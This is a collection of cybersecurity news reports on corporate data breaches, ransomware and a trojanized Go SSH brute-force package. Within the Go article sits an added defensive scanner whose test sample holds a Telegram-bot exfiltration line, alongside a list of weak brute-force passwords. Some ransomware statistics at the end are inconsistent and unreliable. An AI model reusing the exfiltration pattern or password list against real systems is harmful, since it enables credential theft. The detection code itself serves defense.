Unlike credit information, which can be monitored or reset, Social Security numbers cannot be reset, and a stolen number may serve as a gateway to long-term identity theft and fraud. Several financial security experts warn that such information can be used for a number of purposes, including opening unauthorised credit lines, applying for loans or government benefits under stolen identities, submitting false tax returns, and other financial crimes.

Considering that TransUnion is among the largest credit bureaus in the nation and holds records on over 260 million Americans, this breach raises serious concerns about the resilience of institutions that safeguard some of the country's most critical consumer information. Affected individuals have now been notified of the breach, which was detected on July 28 and contained within hours.

TransUnion, which together with Equifax and Experian is one of the nation's three primary credit bureaus, says that its core credit database and consumer credit reports were not compromised. Rather, the intrusion was traced to a third-party application supporting U.S. consumer operations, where unauthorised access exposed limited personal information. According to court filings in Maine and Texas, however, that data included names, birthdates, and Social Security numbers. 

In order to assess the full scope of this incident, TransUnion has engaged an independent cybersecurity expert to conduct a forensic analysis. The incident occurred in the midst of a large wave of cyberattacks targeting Salesforce-connected software. In June, Google revealed that hackers were using modified versions of Salesforce-related tools for infiltration and stealing large amounts of sensitive data from cloud systems. ShinyHunters, a cybercriminal organisation suspected of being involved in such campaigns, has been accused of using extortion tactics against employees of victim companies.

Security researchers have noted that some of the biggest corporations in the world have been breached in similar ways in recent months, including Google, Farmers Insurance, Allianz Life, Workday, Pandora, Cisco, Chanel, and Qantas. This highlights how widespread supply-chain vulnerabilities are across popular platforms, and the dangers they pose. 

Salesforce has maintained that social engineering attacks against users, not flaws in its platform, were at fault. A comparison is inevitably drawn with Equifax's 2017 data breach, one of the biggest in U.S. history, in which the personal data of 147 million Americans was exposed, costing the company nearly $700 million in settlements and fines on top of further financial losses. 

In the wake of that incident, congressional hearings were held and scrutiny of the credit reporting industry intensified, leading to state and federal reforms aimed at strengthening consumer data protection. Following the TransUnion breach, security experts are once again urging those affected to be vigilant: reviewing their credit reports, setting up fraud alerts, and monitoring their accounts for unusual activity. 

At present, AnnualCreditReport.com is providing free weekly credit reports from all three major credit bureaus, and additional monitoring services may help detect signs of fraud. Meanwhile, Schubert Jonckheer & Kolbe has announced an investigation into the TransUnion incident, signalling the possibility of further litigation. 

TransUnion has yet to provide details of the new safeguards it intends to implement, nor has it said whether financial restitution will be offered to victims. Over the last few years there has been a growing number of high-profile breaches attributed to vulnerabilities at third-party providers.

For example, in June 2025, a cyberattack against Chain IQ exposed proprietary data and banking information belonging to the banking giant UBS. The following month, Allianz Life announced that a compromised cloud-based customer relationship management system had been used to obtain personal information on the majority of its 1.4 million American customers. That same month, Qantas confirmed that approximately six million customer records were exposed after hackers breached a third-party customer service platform on which the airline relied. 

Researchers have linked many of these incidents to cybercriminal groups such as ShinyHunters and Scattered Spider, both of which specialise in exploiting third-party information technology and cloud providers through advanced social engineering. A number of these groups are thought to be associated with "The Com," a sprawling, loosely organised cybercriminal community of thousands of English-speaking actors who have collaborated on data theft, extortion, and fraud campaigns across a wide range of industries. 

These recent incidents highlight the persistent vulnerability of third-party platforms and the increasing sophistication of the cybercriminal groups attacking the financial services industry. As the breach reminds consumers, even when core systems remain intact, the theft of identifying information such as Social Security numbers can have long-term impacts that extend well beyond the initial intrusion, whether or not that intrusion is detected. 

Individuals are strongly advised to do more than simply review their credit reports: freezing their credit with all three credit bureaus prevents criminals from opening new accounts in their name, while a fraud alert makes it harder for criminals to take advantage of stolen information. 

Consumers should also consider identity monitoring tools that scan the dark web for compromised information before potential misuse turns into financial damage. 

There is also a clear lesson about reliance on third-party applications: organisations need not only contractual protections but also continuous monitoring, rigorous vetting, and layered defences to prevent unauthorised access to their systems. Supply chain attacks will only grow as a problem, and resilience will depend on proactive investment in security as well as consumer awareness of the threats.

Nearly Two Billion Discord Messages Scraped and Sold on Dark Web Forums

 

Security experts have raised alarms after discovering that a massive collection of Discord data is being offered for sale on underground forums. According to researchers at Cybernews, who reviewed the advertisement, the archive reportedly contains close to two billion messages scraped from the platform, alongside additional sensitive information. The dataset allegedly includes 1.8 billion chat messages, records of 35 million users, 207 million voice sessions, and data from 6,000 servers, all available to anyone willing to pay. 

Discord, a platform widely used for gaming, social communities, and professional groups, enables users to connect via text, voice, and video across servers organized around different interests. Many of these servers are open to the public, meaning their content—including usernames, conversations, and community activity—can be accessed by anyone who joins. While much of this information is publicly visible, the large-scale automated scraping of data still violates Discord’s Terms of Service and could potentially breach data protection regulations such as the EU’s General Data Protection Regulation (GDPR) or California’s Consumer Privacy Act (CCPA).

The true sensitivity of the dataset remains unclear, as no full forensic analysis has been conducted. It is possible that a significant portion of the messages and voice records were collected from publicly accessible servers, which would reduce—but not eliminate—the privacy concerns. However, the act of compiling, distributing, and selling this information at scale introduces new risks, such as the misuse of user data for surveillance, targeted phishing, or identity exploitation. 

Discord has faced similar challenges before. In April 2024, a service known as Spy.Pet attempted to sell billions of archived chat logs from the platform. That operation was swiftly shut down by Discord, which banned the associated accounts and confirmed that the activity violated its rules. At the time, the company emphasized that automated scraping and self-botting were not permitted under its Terms of Service and stated it was exploring possible legal action against offenders. 

The recurrence of large-scale scraping attempts highlights the ongoing tension between the open nature of platforms like Discord and the privacy expectations of their users. While public servers are designed for accessibility and community growth, they can also be exploited by malicious actors seeking to harvest data en masse. Even if the information being sold in the latest case is largely public, the potential to cross-reference user activity across communities raises broader concerns about surveillance and abuse. 

As of now, Discord has not issued an official statement on this latest incident, but based on previous responses, it is likely the company will take steps to disrupt the sale and enforce its policies against scraping. The incident serves as another reminder that users on open platforms should remain mindful of the visibility of their activity and that service providers must continue to balance openness with strong protections against data misuse.

Maryland’s Paratransit Service Hit by Ransomware Attack

 

The Maryland Transit Administration (MTA), operator of one of the largest multi-modal transit systems in the United States, is currently investigating a ransomware attack that has disrupted its Mobility paratransit service for disabled travelers. 

While the agency’s core transit services—including Local Bus, Metro Subway, Light Rail, MARC, Call-A-Ride, and Commuter Bus—remain operational, the ransomware incident has left the MTA unable to accept new ride requests for its Mobility service, which is critical for individuals with disabilities who rely on specialized transportation. 

According to the MTA, the cybersecurity breach involved unauthorized access to certain internal systems. The agency is working closely with the Maryland Department of Information Technology to assess and mitigate the impact. Riders who had already scheduled Mobility trips prior to the attack will still receive their services as planned. However, until the issue is resolved, new bookings cannot be processed through the standard Mobility system.

In response to the disruption, the MTA is directing eligible customers to its Call-A-Ride program as an alternative. This service can be accessed online or by phone, providing a temporary solution for those in need of transportation while the Mobility system remains unavailable for new requests.

The agency has emphasized its commitment to resolving the incident quickly and securely, promising regular updates as more information becomes available. 

This incident is not isolated. Over the past two years, similar ransomware attacks have targeted paratransit and public transit services in multiple states, including Missouri and Virginia, often leaving municipalities to scramble for alternative solutions for disabled residents.

The MTA has stated that its primary focus is on ensuring the safety and security of both customers and employees. It is collaborating with government partners and media outlets to keep the public informed and to support affected communities throughout the recovery process. 

The MTA’s experience underscores the growing risk that ransomware poses to critical public infrastructure, particularly services that support vulnerable populations. As investigations continue, the agency urges customers to stay informed through official channels and to utilize available alternatives like Call-A-Ride until normal operations can resume.

Whistleblower: Social Security Data of 300 Million Americans at Risk After Agency Mishandling

 

A whistleblower has alleged that Social Security information belonging to over 300 million Americans was compromised when Department of Government Efficiency (DOGE) personnel uploaded sensitive data to a cloud storage system lacking adequate security oversight.

The potentially exposed information encompasses a broad range of personal details, including medical diagnoses, financial records, banking data, family relationships, and biographical information. 

The whistleblower expressed concerns that malicious actors gaining access to this cloud environment could enable massive identity theft schemes, potentially disrupting Americans' access to essential healthcare and food assistance programs while forcing the government to undertake the costly process of reissuing Social Security numbers nationwide. 

The Social Security Administration has acknowledged the whistleblower's claims while appearing to minimize their severity. Officials stated that personal information remains housed in secure systems with comprehensive protective measures and emphasized that the data resides in an established SSA environment isolated from internet access. 

The agency maintains it has not detected any security compromises to this system. Despite these assurances, cybersecurity experts warn of substantial risks to personal information resulting from government data handling practices. 

Safety measures 

Financial advisors recommend maintaining calm while implementing protective measures. Melissa Caro from My Retirement Network notes that while such incidents are concerning, Americans' personal information faces constant exposure through various channels. She emphasizes that Social Security numbers have been compromised repeatedly in the past, making ongoing protective measures essential. 

Experts recommend two primary defense strategies: 

Credit monitoring: Establish free accounts with all three major credit bureaus to regularly review credit reports and identify potential issues. The federally authorized AnnualCreditReport.com provides weekly access to reports from Equifax, Experian, and TransUnion, enabling users to monitor their credit profiles for unauthorized activity. 

Credit freezes: Implement credit freezes across all bureau profiles to prevent unauthorized account openings. Catherine Valega from Green Bee Advisory strongly endorses this approach as immediate protection. These free protective measures outperform most commercial identity protection services.

Additional security practices include using unique passwords with multi-factor authentication and maintaining skepticism toward unsolicited communications allegedly from Social Security or financial institutions. Caro emphasizes that regardless of this specific incident, these protective steps should be standard practice given the persistent threat landscape.

Workiva Confirms Data Breach in Wake of Salesforce Security Incident


 

Workiva has disclosed a breach linked to the recent wave of attacks on Salesforce customers, serving as a reminder of the increasing cybersecurity risks faced by global organisations. Workiva provides cloud-based financial reporting, compliance, and audit software. 

The company confirmed that attackers accessed a third-party customer relationship management (CRM) system, exposing a limited set of company contact details, including names, email addresses, phone numbers, and support ticket information. Importantly, Workiva stressed that its own platform and customer data remain safe and secure. 

The breach has been linked to the ShinyHunters extortion group and is part of a broader campaign in which the threat actors have gained unauthorized access to sensitive business information through methods including stolen OAuth tokens and voice phishing. In response, Workiva has warned customers to stay alert for spear phishing attempts and emphasized that all official communications will continue to come only from its verified support channels. 

Workiva, whose cloud-based platform is widely used for financial reporting, compliance and audit processes, traced the breach to unauthorized access to a third party's customer relationship management system. Adobe has also reported a security breach. 

In notifications sent to clients who may be affected, the company disclosed that attackers accessed a limited set of business contact details, such as names, email addresses, phone numbers, and support ticket data. Workiva clarified that its core platform and any customer data stored in it have not been compromised; rather, the intrusion originated via a connected third-party application managed by the vendor responsible for Workiva's customer relationship management system. 

The company serves over 6,300 customers, including 85 percent of Fortune 500 companies and prominent names such as Google, T-Mobile, Delta Air Lines, Wayfair, Hershey, and Mercedes-Benz, so it stressed the importance of staying vigilant and warned that the stolen data could be used for spear-phishing scams. 

To reassure customers, Workiva reiterated that it would never solicit sensitive information by text or phone and that it would communicate only through its trusted support channels. The wave of intrusions has kept the cybersecurity community on its toes, since even the most prominent security vendors were not spared. 

Cloudflare, for example, reported that attackers bypassed social engineering altogether, instead exploiting compromised credentials linked to Salesloft Drift, a third-party application integrated with Salesforce. 

Using this access, threat actors infiltrated Cloudflare's Salesforce environment on August 12 and spent two days mapping the system before a rapid exfiltration operation that, within minutes, siphoned off sensitive data, deleted log files and attempted to erase digital traces. 

Earlier, Palo Alto Networks confirmed that a similar breach had occurred between August 8 and 18, with attackers leveraging stolen OAuth tokens to gain access to its Salesforce environment through the integration. In this period, adversaries were able to extract customer contact information, sales records, and case data. 

The adversaries then scanned the stolen data for passwords and cloud service credentials, which were used to facilitate secondary attacks targeting AWS and Snowflake platforms. Analysts point out that these incidents do not mean that core defences have collapsed, but rather that trust dependencies within digital ecosystems are fragile. 

By exploiting weak access controls and third-party connections, groups like Scattered Spider, Lapsus$, and ShinyHunters have profited from stolen data through ransom demands and sales on underground channels, raising concern that the scope of exposure may be much larger than has so far been revealed.

Workday, one of the world's largest HR software providers, has also confirmed that it became a victim of the cyberattack campaign targeting Salesforce's customer relationship management platform. The incident, first reported on August 6, may have impacted the personal information of up to 70 million individuals as well as the business information of 11,000 corporate clients. 

While Workday stressed that its core HR systems, known as customer tenants, were unaffected by the attack, it admitted that attackers were able to access business contact details in its Salesforce integration, including names, email addresses, phone numbers, and facsimile numbers. The growing list of victims includes Google, Cisco, Qantas, and Pandora as well as other large companies. 

The breach underscores how adversaries are increasingly targeting third-party service providers that act as gateways to vast amounts of personal data. With roughly 60% of Fortune 500 companies using Workday's platform, the incident emphasizes the risks of an interconnected digital supply chain. 

A number of security experts have warned that SaaS and CRM systems, once treated as routine business tools, have become highly valuable attack surfaces for cyber criminals. With analysts pointing to ShinyHunters as the likely culprit, attention has turned to the group's tactics, namely phishing campaigns in which attackers impersonate HR and IT staff to trick employees into handing over their credentials. 

The breach has reignited debate among cybersecurity professionals over whether these incidents reflect increasingly sophisticated social engineering techniques or persistent shortcomings in organizational awareness and training. In light of the string of breaches tied to Salesforce integrations, enterprises are reassessing how they monitor and secure the third-party platforms woven into their daily operations. 

The incidents were unprecedented in their scope and severity, and although some companies have contained the fallout more quickly than others, they illustrate that even the most trusted vendors are not invulnerable. Most cybersecurity specialists believe that organizations need to build a broader security posture beyond perimeter defense, including vendor risk management and zero-trust frameworks, as well as tighter controls on identity and access. 

Auditing integrations on a regular basis, minimizing permissions granted through OAuth, and monitoring API usage are no longer optional safeguards, but are strategic imperatives in an environment where many attackers thrive on exploiting overlooked trust relationships in order to achieve the greatest possible gain. 

Additionally, greater employee awareness of spear-phishing and impersonation schemes can be a critical component in reducing credential theft, an entry point that is becoming more prevalent each year. For organizations reliant on SaaS ecosystems, the lesson is clear: securing the extended supply chain is as important to business resilience as protecting internal infrastructure, and those who adapt will be best positioned to withstand the next wave of attacks.

Over 624,000 Impacted in Major Healthcare Data Breach: SSNs, Financial Data, and Identity Theft Risks

 


A massive healthcare data breach has exposed the sensitive information of more than 624,000 individuals, putting Social Security numbers, financial details, and account credentials at risk.

The breach targeted Healthcare Services Group Inc. (HSGI), a Pennsylvania-based company that manages dining, housekeeping, and laundry services for hospitals across 48 U.S. states. According to BleepingComputer, HSGI has begun notifying impacted individuals through official letters.

Hackers infiltrated HSGI’s network in late September 2024, but the intrusion wasn’t discovered until October 7, 2024. An investigation revealed that a wide range of personal data may have been compromised, including:
  • Full names
  • Social Security numbers
  • Driver’s license and state ID numbers
  • Financial account details
  • Login credentials

The type of data exposed varies for each victim. Some may only have had their names leaked, while others also had SSNs and financial data exposed.

If you receive a data breach notification letter from HSGI, it will outline exactly what information of yours was exposed. The company is offering affected individuals free identity theft protection services from Experian, though the coverage period (12 months vs. 24 months) has not been confirmed.

Even though there’s no evidence yet of misuse of stolen data, experts warn that hackers could use the information for phishing attacks, fraud, or identity theft. Victims are urged to:
  • Monitor bank and credit card accounts closely
  • Watch for suspicious emails or texts
  • Avoid clicking unknown links or downloading attachments
  • Use trusted antivirus software on all devices

The healthcare industry has become a prime target for cybercriminals due to the high value of medical and financial records. Analysts believe this will not be the last attack of its kind, as similar breaches have been reported throughout the past year.

While individuals cannot control a company’s cybersecurity, they can take proactive measures once a breach occurs. As experts warn: You may not stop the breach, but you can protect yourself from becoming the next victim of identity fraud.

Zscaler Confirms Exposure in Salesloft-Linked Data Breach

 

Zscaler has confirmed that it is among the latest organizations to be impacted by a major supply chain attack exploiting the Salesloft Drift application, which integrates with Salesforce. 

According to the company, attackers managed to steal OAuth tokens tied to the third-party app, giving them access to Zscaler’s Salesforce environment. The security vendor explained that the compromised data mainly consisted of business-related information rather than sensitive personal or financial records. Specifically, the exposed details included names, work email addresses, job titles, phone numbers, location data, licensing and commercial details relating to Zscaler products, as well as plain-text content from certain customer support cases. However, Zscaler emphasized that no attachments, files, or images were accessed in the incident. 

Upon detecting the unauthorized activity, the company acted quickly by revoking the Drift app’s access and rotating other API tokens as a precaution. In addition, it claimed to have put in place new safeguards and strengthened protocols to reduce the likelihood of similar breaches in the future. 

While Zscaler noted that the incident appeared limited in scope and said there is no evidence so far of any misuse of the exposed data, it urged customers to exercise extra caution. The company warned that malicious actors could exploit the stolen information for phishing campaigns or social engineering attacks, and therefore advised clients to be vigilant about unsolicited emails, calls, or requests for confidential information. 

This breach is part of a wider campaign being tracked by security researchers as UNC6395, which is said to have compromised numerous Salesforce customer environments between August 8 and August 18. The attackers reportedly exfiltrated large volumes of customer data during that period, potentially affecting hundreds of organizations. 

More recently, it has also been revealed that the same campaign targeted a limited number of Google Workspace accounts through Salesloft Drift integrations, further underlining the scope of the threat. Given the scale and operational sophistication demonstrated, some experts have speculated that a nation-state threat actor could be behind the attacks. 

Zscaler’s disclosure follows similar admissions from other companies caught in the same campaign, highlighting the continuing risks posed by supply chain compromises in cloud-based business ecosystems.

Malicious Go Package Disguised as SSH Tool Steals Credentials via Telegram

 

Researchers have uncovered a malicious Go package disguised as an SSH brute-force tool that secretly collects and transmits stolen credentials to an attacker-controlled Telegram bot. The package, named golang-random-ip-ssh-bruteforce, first appeared on June 24, 2022, and was linked to a developer under the alias IllDieAnyway. Although the GitHub profile tied to this account has since been removed, the package is still accessible through Go’s official registry, raising concerns about supply chain security risks for developers who might unknowingly use it. 

The module is designed to scan random IPv4 addresses in search of SSH services operating on TCP port 22. Once it detects a running service, it attempts brute-force login using only two usernames, “root” and “admin,” combined with a list of weak and commonly used passwords. These include phrases such as “root,” “test,” “password,” “admin,” “12345678,” “1234,” “qwerty,” “webadmin,” “webmaster,” “techsupport,” “letmein,” and “Passw@rd.” If login succeeds, the malware immediately exfiltrates the target server’s IP address, username, and password through Telegram’s API to a bot called @sshZXC_bot, which forwards the stolen information to a user identified as @io_ping. Since Telegram communications are encrypted via HTTPS, the credential theft blends into ordinary web traffic, making detection much more difficult. 

The design of the tool helps it remain stealthy while maximizing efficiency. To bypass host identity checks, the module disables SSH host key verification by setting ssh.InsecureIgnoreHostKey as its callback. It continuously generates IPv4 addresses while attempting concurrent logins in an endless loop, increasing the chances of finding vulnerable servers. Interestingly, once it captures valid credentials for the first time, the malware terminates itself. This tactic minimizes its exposure, helping it avoid detection by defenders monitoring for sustained brute-force activity. 
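As an added defensive example (not code from the report or from the package it describes), the following Go program uses go/ast to flag the two traits described above in a dependency's source before it is built: host-key verification disabled via ssh.InsecureIgnoreHostKey (resolving any import alias) and hard-coded Telegram Bot API URLs. The source it scans is constructed for this example and the bot token is a placeholder.

```go
// Added example: a static check over Go source for two traits the article
// attributes to the malicious module. It only parses (no type-checking, no
// import resolution), so it can run over a vendored dependency offline.
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// Finding is one suspicious construct and the source line it appears on.
type Finding struct {
	Kind string // "insecure-hostkey" or "telegram-endpoint"
	Line int
	Text string
}

const cryptoSSHPath = "golang.org/x/crypto/ssh"
const telegramBotAPI = "api.telegram.org/bot"

// ScanGoSource parses src (one Go file) and returns findings in source order.
func ScanGoSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}

	// Resolve the local name this file uses for x/crypto/ssh; it may be aliased.
	sshName := ""
	for _, imp := range f.Imports {
		if path, err := strconv.Unquote(imp.Path.Value); err == nil && path == cryptoSSHPath {
			sshName = "ssh"
			if imp.Name != nil {
				sshName = imp.Name.Name
			}
		}
	}

	var findings []Finding
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.SelectorExpr:
			// <ssh>.InsecureIgnoreHostKey accepts any host key, so the client
			// can never notice a man-in-the-middle on the SSH connection.
			if id, ok := x.X.(*ast.Ident); ok && sshName != "" &&
				id.Name == sshName && x.Sel.Name == "InsecureIgnoreHostKey" {
				findings = append(findings, Finding{
					Kind: "insecure-hostkey",
					Line: fset.Position(x.Pos()).Line,
					Text: id.Name + "." + x.Sel.Name,
				})
			}
		case *ast.BasicLit:
			// A string literal pointing at the Telegram Bot API is a likely
			// exfiltration channel that blends into ordinary HTTPS traffic.
			if x.Kind == token.STRING {
				if s, err := strconv.Unquote(x.Value); err == nil && strings.Contains(s, telegramBotAPI) {
					findings = append(findings, Finding{
						Kind: "telegram-endpoint",
						Line: fset.Position(x.Pos()).Line,
						Text: s,
					})
				}
			}
		}
		return true
	})
	return findings, nil
}

// sample is a constructed file showing both traits; <TOKEN> is a placeholder.
const sample = `package main

import (
	"net/http"
	xssh "golang.org/x/crypto/ssh"
)

func dial(addr string) {
	cfg := &xssh.ClientConfig{HostKeyCallback: xssh.InsecureIgnoreHostKey()}
	_ = cfg
	http.Get("https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=1&text=" + addr)
}
`

// clean is a constructed file with neither trait.
const clean = "package main\n\nimport \"net/http\"\n\nfunc ping() { http.Get(\"https://example.invalid/\") }\n"

func main() {
	for _, src := range []string{sample, clean} {
		findings, err := ScanGoSource("dep.go", src)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("%d finding(s)\n", len(findings))
		for _, f := range findings {
			fmt.Printf("  line %d: %s (%s)\n", f.Line, f.Kind, f.Text)
		}
	}
}
```

The same walk can be extended to a whole module directory with parser.ParseDir; a hit on either rule is a reason to read the dependency, not proof of malice on its own.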

Archival evidence suggests that the creator of this package has been active in the underground hacking community for years. Records link the developer to the release of multiple offensive tools, including an IP port scanner, an Instagram parser, and Selica-C2, a PHP-based botnet for command-and-control operations. Associated videos show tutorials on exploiting Telegram bots and launching SMS bomber attacks on Russian platforms. Analysts believe the attacker is likely of Russian origin, based on the language, platforms, and content of their activity. 

Security researchers warn that this Trojanized Go module represents a clear supply chain risk. Developers who unknowingly integrate it into their projects could unintentionally expose sensitive credentials to attackers, since the exfiltration traffic is hidden within legitimate encrypted HTTPS connections. This case underscores the growing threat of malicious open-source packages being planted in widely used ecosystems, where unsuspecting developers become conduits for large-scale credential theft.

Cybersecurity Landscape Shaken as Ransomware Activity Nearly Triples in 2024

 


Ransomware is one of the most persistent threats in the evolving landscape of cybercrime, but its escalation in 2024 marked an alarming turning point. No longer restricted to high-profile corporations, attackers extended their reach with unprecedented precision into hospitals, financial institutions, and even government agencies, sectors that are especially vulnerable to such crippling disruptions. 

By employing stronger encryption methods and more aggressive extortion tactics, cybercriminals demonstrated a ruthless pursuit of maximum damage and financial gain. This shift is borne out by newly released data from threat intelligence firm Flashpoint, which shows that the number of ransomware attacks observed in the first half of 2025 increased by 179 per cent compared with the same period in 2024, almost tripling in just a year. 

Throughout 2022 and 2023, the ransomware landscape offered little relief as threat actors relentlessly escalated their tactics. Attackers increasingly used threats of data exfiltration and public exposure to force companies to comply with their demands. 

Even companies that managed to restore their operations from backups were not spared, as sensitive information often leaked onto underground forums and leak sites controlled by criminal groups. This contributed to a 13 per cent year-over-year increase in ransomware incidence, greater than the cumulative increases of the past five years combined. 

Verizon’s Data Breach Investigations Report underscored the severity of this trend. Statista, for its part, predicted that about 70 per cent of businesses would face at least one ransomware attack in 2022, the highest rate ever recorded. Verizon’s 2022 year-over-year analysis highlighted education, government and healthcare as the industries hit hardest that year. 

By 2023, healthcare had emerged as one of the most targeted sectors, reflecting attackers' calculated strategy of going after industries that are least able to sustain prolonged disruption. Within the ongoing ransomware crisis, small and mid-sized businesses are considered some of the most vulnerable targets. 

Verizon’s research documented 832 ransomware-related incidents at small businesses by 2022; 130 of these resulted in confirmed data loss, and nearly 80 per cent of those events were directly attributable to ransomware. Compounding the risk, only half of U.S. small businesses maintain a formal cybersecurity plan, according to a report quoted by UpCity Globally. 

A survey conducted by Statista found that 72 per cent of businesses were impacted by ransomware, with 64.9 per cent of those organisations ultimately yielding to ransom demands. A separate survey of 1,500 cybersecurity professionals conducted by Cybereason painted a similarly worrying picture: more than two-thirds of organisations reported experiencing a ransomware attack, a 33 per cent increase over the previous year, and almost two-thirds of those attacks involved a compromised third party. 

The consequences for organisations were severe and went well beyond financial losses. Approximately 40 per cent of companies had to lay off employees following an attack, 35 per cent reported resignations of senior executives, and one third temporarily suspended operations. 

Unfortunately, attackers often persisted inside networks undetected for long periods. Some 63 per cent of affected organisations reported that intruders had been present for as long as six months, and others reported access lasting over a year before it was noticed. Most companies chose to pay the ransom despite the risks involved, 49 per cent to avoid revenue losses and 41 per cent to speed up recovery. 

Even so, payment offered no guarantee of data recovery: over half of the companies that paid reported corrupted or unusable data after decryption, and the majority of financial damages fell between $1 million and $10 million. The use of generative artificial intelligence within ransomware operations is an emerging concern as well. 

Although the scope of these experiments remains limited, some groups have begun exploring large language models to reduce operational burdens, for example by automating the generation of phishing templates. Researchers have identified Funksec, a group that surfaced in late 2024 and is believed to have contributed to the WormGPT model, as one of the first to experiment with this capability, and more gangs are likely to incorporate artificial intelligence into their tactics in the near future.

Furthermore, analysts at Flashpoint found that gang members are recycling victims of other ransomware groups, long after the initial breaches, in order to build a reputation on underground forums. By scale, the first half of 2025 was dominated by a few particularly active operators: Akira with 537 attacks, Clop/Cl0p with 402, Qilin with 345, Safepay Ransomware with 233, and RansomHub with 23. 

DragonForce has also drawn significant attention in the United Kingdom after the group targeted household names including Marks & Spencer and the Co-op Group. The United States remained by far the most targeted country, with 2,160 attacks, well ahead of Canada’s 249, Germany’s 154 and the UK’s 148, while Brazil, Spain, France, India and Australia also recorded high numbers. 

By industry, manufacturing and technology proved the most lucrative targets, accounting for 22 and 18 per cent of incidents respectively, while retail, healthcare and business services together accounted for 15 per cent. The report also highlighted how the boundaries between hacktivist groups and state-sponsored actors are becoming increasingly blurred, illustrating the complexity of today's threat environment. 

During the first half of 2025, 137 of the threat actor activities tracked were attributed to state-sponsored groups and 9 per cent to hacktivists, while the remaining 51 per cent were attributed to cybercriminal organisations. Entities affiliated with the Iranian state, such as GhostSec and Arabian Ghosts, have shown a growing focus on critical infrastructure. 

These entities are reported to have targeted programmable logic controllers connected to Israeli media and water systems. Groups such as CyberAv3ngers also sought to spread unverified narratives ahead of disruptive attacks on technology. State-aligned operations frequently resurface under new identities, such as APT IRAN, demonstrating their shifting strategies and adaptive nature. 

Taken together, the surge in ransomware activity and the diversification of threat actors paint a sobering picture of the challenges ahead. No sector, geography or organisation size is immune to disruption, and cybercriminals appear set to innovate faster than ever and to borrow state-linked tactics, which means the stakes will only rise over time. 

Proactive security management goes beyond ensuring compliance or minimising damage; it means cultivating a security culture that anticipates threats rather than merely reacting to them. By investing in modern defences such as continuous threat intelligence, real-time monitoring and zero-trust architectures, and by addressing fundamental weaknesses in supply chains and third-party partnerships, which frequently open the door to attacks, companies can significantly reduce their risk exposure. 

It is equally important to address the human side of cyber resilience: employees must be security-aware, incidents must be reported quickly, and leadership needs to be visibly committed to the effort. 

Although the outlook may seem daunting, organisations that choose preparedness over complacency will be far better placed to cope with ransomware and the wider range of cyber threats reshaping the digital age. In an environment defined by persistent and innovative attackers, a resilient security posture remains the ultimate defence.